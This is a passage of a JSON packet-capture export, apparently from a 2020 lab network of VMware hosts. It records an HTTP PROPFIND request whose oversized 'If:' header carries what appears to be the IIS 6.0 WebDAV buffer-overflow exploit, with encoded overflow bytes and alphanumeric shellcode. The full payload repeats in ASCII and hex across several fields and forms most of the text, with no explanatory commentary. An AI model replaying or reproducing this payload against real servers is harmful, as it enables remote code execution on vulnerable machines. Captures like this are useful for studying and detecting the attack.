:91:99:e6:8d:ac:e6:bd:99:e4:a9:a4:e6:b9:b7:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/dkOoUQmChYxxslVfYuLXuqeipevKfuEJzHuEQysaFmMAvqLaXowoTgYAejlOZDEKrpxeqHGIwvbvY<76><59><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/QcfCGYRTbmGSlSaoclyKQxmRQLNdvmaDDwAspyHPFkYgywuEVORlNOJuirshlcKcKfAGlFAoQHJqs<71><73><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "472"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.863741000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.863741000",
|
||
"frame.time_delta": "0.000066000",
|
||
"frame.time_delta_displayed": "0.003508000",
|
||
"frame.time_relative": "17.114681000",
|
||
"frame.number": "480",
|
||
"frame.len": "281",
|
||
"frame.cap_len": "281",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "267",
|
||
"ip.id": "0x00009d87",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000092fe",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "33911",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "33911",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "70",
|
||
"tcp.len": "215",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3707770000",
|
||
"tcp.nxtseq": "1664",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2591451605",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000b650",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:7f:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:7f:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868671",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000274000",
|
||
"tcp.analysis.bytes_in_flight": "1663",
|
||
"tcp.analysis.push_bytes_sent": "1663"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000608000",
|
||
"tcp.time_delta": "0.000066000"
|
||
},
|
||
"tcp.payload": "55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "479",
|
||
"tcp.segment": "480",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1663",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:47:50:46:65:4d:49:56:6b:54:6a:62:4e:69:4f:72:53:52:45:67:43:76:63:6b:6c:4f:6f:4c:56:58:55:47:63:6a:6e:78:42:63:53:50:6f:59:51:4b:6f:79:51:72:5a:6c:61:44:49:76:52:4c:45:45:65:7a:55:63:70:58:6f:73:50:72:4e:79:57:65:58:72:71:45:57:e6:89:8e:e6:a9:93:e5:a1:b1:e6:b9:a9:e4:91:83:e4:8d:94:e7:a9:97:e6:ad:98:e6:85:ad:e5:89:b5:e6:b9:a1:e7:9d:85:e6:89:90:e4:85:a8:e7:91:92:e4:99:af:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:89:95:e4:91:b9:e4:ad:84:e4:b9:98:e4:b1:b5:e4:ad:93:e4:9d:96:e4:95:a2:e5:95:84:e6:a1:97:e5:91:87:e6:b1:83:e4:b9:b6:e5:a5:b4:e6:91:8d:e7:95:96:e7:9d:b3:e6:b9:a7:e6:a5:98:e7:99:82:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4c:50:73:79:5a:67:46:4d:56:74:52:69:70:55:4b:64:54:76:7a:53:47:4a:4e:43:6d:63:4e:77:48:6d:48:79:51:59:57:45:47:6c:78:6b:67:6e:4f:49:78:6c:48:71:48:55:6c:48:78:6f:50:6e:79:65:6d:6e:54:68:76:76:53:73:59:53:66:56:45:75:72:68:48:51:e4:ad:a3:e6:bd:92:e7:a1:b0:e7:91:92:e7:91:b9:e5:a9:90:e7:8d:a8:e6:a9:b8:e7:89:a4:e5:95:b5:e7:89:a2:e6:8d:8a:e6:89:90:e4:a9:8c:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:b5:a8:e7:a5:84:e5:89:b1:e5:a1:ad:e1:8f:80:e6:a0:83:e7:a5:8f:e6:a1:b0:e7:81:8e:e6:ad:ba:e4:a9:90:e5:a9:84:e6:a5:88:e4:bd:99:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
